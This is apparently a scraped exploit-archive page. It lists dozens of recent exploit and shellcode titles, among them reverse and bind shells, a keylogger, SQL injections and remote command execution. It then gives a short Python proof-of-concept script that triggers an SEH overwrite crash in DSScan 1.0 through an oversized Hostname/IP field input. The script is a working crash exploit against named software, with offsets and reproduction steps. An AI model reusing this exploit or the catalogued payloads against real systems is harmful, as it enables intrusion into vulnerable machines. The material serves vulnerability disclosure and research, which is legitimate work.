ab70fd48b8
27 new exploits Microsoft Edge Chakra - Uninitialized Arguments Microsoft Edge Chakra - Uninitialized Arguments (1) MyDoomScanner 1.00 - Local Buffer Overflow (PoC) DSScan 1.0 - Local Buffer Overflow (PoC) MessengerScan 1.05 - Local Buffer Overflow (PoC) NoviFlow NoviWare <= NW400.2.6 - Multiple Vulnerabilities Dive Assistant Template Builder 8.0 - XML External Entity Injection Kolibri WebServer 2.0 - Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass Kolibri WebServer 2.0 - Buffer Overflow (EMET 5.0 / EMET 4.1 Partial Bypass) SpyCamLizard 1.230 - Buffer Overflow Mozilla Firefox < 45.0 - 'nsHtml5TreeBuilder' Use-After-Free (EMET 5.52 Bypass) BSD/x86 - setuid/portbind 31337/TCP Shellcode (94 bytes) BSD/x86 - Bind Shell 31337/TCP + setuid(0) Shellcode (94 bytes) BSD/x86 - Bind 31337/TCP Shellcode (83 bytes) BSD/x86 - Bind Shell 31337/TCP Shellcode (83 bytes) BSD/x86 - break chroot Shellcode (45 bytes) BSD/x86 - Break chroot Shellcode (45 bytes) BSD/x86 - connect torootteam.host.sk:2222 Shellcode (93 bytes) BSD/x86 - Connect torootteam.host.sk:2222 Shellcode (93 bytes) BSD/x86 - Reverse Portbind 6969/TCP Shellcode (129 bytes) BSD/x86 - Reverse Shell 6969/TCP Shellcode (129 bytes) FreeBSD/x86 - Reverse Portbind 127.0.0.1:8000 /bin/sh Shellcode (89 bytes) FreeBSD/x86 - Reverse Shell 127.0.0.1:8000 /bin/sh Shellcode (89 bytes) (Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes) (Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes) Cisco IOS - Connectback Port 21 Shellcode Cisco IOS - Connectback 21/TCP Shellcode Linux/x86 - Reverse Telnet Shellcode (134 bytes) Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes) Windows 9x/NT/2000/XP - Reverse Generic without Loader Shellcode (249 bytes) Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes) ARM - Bind Shell Port 0x1337 Shellcode ARM - Bind Connect 68/UDP Shellcode ARM - Bind Shell 0x1337/TCP Shellcode ARM - Bind Connect 68/UDP (Reverse Shell 192.168.0.1:67/UDP) Shellcode OSX/Intel (x86-64) - reverse_tcp shell Shellcode (131 bytes) OSX/Intel (x86-64) - Reverse TCP Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes) Windows - DNS Reverse Download and Exec Shellcode (Metasploit) Windows - Reverse Download and Execute via DNS (IPv6) Shellcode (Metasploit) Linux/ARM (Raspberry Pi) - reverse_shell (tcp_10.1.1.2_0x1337) Shellcode (72 bytes) Linux/ARM (Raspberry Pi) - Reverse TCP Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes) Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes) Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes) Windows x86 - Reverse Persistent TCP Shellcode (494 Bytes) Windows x86 - Reverse TCP Persistent Shell (192.168.232.129:4444/TCP) Shellcode (494 Bytes) Linux/x86-64 - Reverse TCP Password Prompt Shellcode (151 bytes) Linux/x86-64 - Reverse TCP Password Prompt Shell (127.0.0.1:4444) Shellcode (151 bytes) Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes) Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes) Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (1) (122 bytes) Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (2) (135 bytes) Linux/x86-64 - Reverse TCP Password Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (1) (122 bytes) Linux/x86-64 - Reverse TCP Password Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (2) (135 bytes) Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes) Linux/x86 - Reverse TCP (IPv6) Shellcode (159 bytes) Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes) Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes) Linux/x86-64 - Bind 1472/TCP (IPv6) Shellcode (199 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes) Linux/x86 - Bind Shell Configurable Port Shellcode (87 bytes) Linux/x86-64 - Reverse TCP Shell Null-Free Shellcode (134 bytes) Linux/x86 - Bind Shell 1234/TCP (Configurable Port) Shellcode (87 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes) Linux/x86 - Reverse TCP Shellcode (75 bytes) Linux/x86 - Reverse TCP Shell Shellcode (75 bytes) Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83_ 148_ 177 bytes) Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83/148/177 bytes) Linux/x86-64 - Subtle Probing Reverse Shell / Timer_ Burst / Password / Multi-Terminal Shellcode (84_ 122_ 172 bytes) Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357) / Subtle Probing / Timer / Burst / Password / Multi-Terminal Shellcode (84/122/172 bytes) Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes) Linux/x86 - Bind Netcat 98/TCP + UDP Shellcode (44/52 bytes) Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes) Linux/x86 - Reverse TCP ZSH (127.255.255.254:9090/TCP) Shellcode (80 bytes) Windows x86 - Reverse UDP Keylogger Shellcode (493 bytes) Windows x64 - Reverse Shell TCP Shellcode (694 bytes) Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) Shellcode (694 bytes) Linux/x86-64 - Reverse TCP Shellcode (65 bytes) Linux/x86-64 - Reverse TCP Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes) Linux/x86-64 - Reverse Shell Shellcode (84 bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes) Linux/x86-64 - Reverse TCP Shell Shellcode (84 bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes) Linux/x86-64 - Reverse Netcat Shellcode (72 bytes) Linux/x86-64 - Reverse Netcat (127.0.0.1:1337) Shellcode (72 bytes) Linux/x86 - Reverse TCP Shellcode (67 bytes) Linux/x86 - Reverse TCP Shell Shellcode (67 bytes) Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes) Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) Shellcode (IPv6) (113 bytes) Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes) Linux/x86 - Reverse UDP Shellcode (668 bytes) Linux/x86 - Bind Shell Shellcode (75 bytes) Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes) Linux/x86-64 - execve(_/bin/sh_) Shellcode (24 bytes) Linux/x86 - Reverse UDP Shell (127.0.0.1:53/UDP) Shellcode (668 bytes) Linux/x86 - Bind Shell 4444/TCP Shellcode (75 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes) SOA School Management - SQL Injection SOA School Management - 'view' Parameter SQL Injection Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection Food Ordering Script 1.0 - SQL Injection LiveCRM 1.0 - SQL Injection LiveSupport 1.0 - SQL Injection LiveInvoices 1.0 - SQL Injection LiveSales 1.0 - SQL Injection LiveProjects 1.0 - SQL Injection Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution Joomla! Component Appointment 1.1 - SQL Injection Joomla! Component Twitch Tv 1.1 - SQL Injection Joomla! Component KissGallery 1.0.0 - SQL Injection Matrimony Script 2.7 - SQL Injection eCardMAX 10.5 - SQL Injection SOA School Management 3.0 - SQL Injection Joomla! Component Zap Calendar Lite 4.3.4 - SQL Injection Joomla! Component Calendar Planner 1.0.1 - SQL Injection Joomla! Component SP Movie Database 1.3 - SQL Injection DeWorkshop 1.0 - Arbitrary File Upload QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities
30 lines
No EOL
1.1 KiB
Python
Executable file
30 lines
No EOL
1.1 KiB
Python
Executable file
#!/usr/bin/python
|
|
# Exploit Title : DSScan v1.0 Hostname/IP Field SEH Overwrite POC
|
|
# Discovery by : Anurag Srivastava
|
|
# Email : anurag.srivastava@pyramidcyber.com
|
|
# Website : http://pyramidcyber.com/
|
|
# Discovery Date : 18/08/2017
|
|
# Software Link : https://www.mcafee.com/in/downloads/free-tools/dsscan.aspx#
|
|
# Tested Version : 1.00
|
|
# Vulnerability Type: SEH Overwrite POC
|
|
# Tested on OS : Windows 10 Home x64
|
|
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
|
|
##########################################################################################
|
|
# -----------------------------------NOTES----------------------------------------------#
|
|
##########################################################################################
|
|
|
|
#SEH chain of main thread
|
|
#Address SE handler
|
|
#0019F900 43434343
|
|
#42424242 *** CORRUPT ENTRY ***
|
|
|
|
|
|
# Offset to the SEH Frame is 560
|
|
buffer = "A"*560
|
|
# Address of the Next SEH Frame
|
|
nseh = "B"*4
|
|
# Address to the Handler Code
|
|
seh = "C" *4
|
|
f = open("evil.txt", "wb")
|
|
f.write(buffer+nseh+seh)
|
|
f.close() |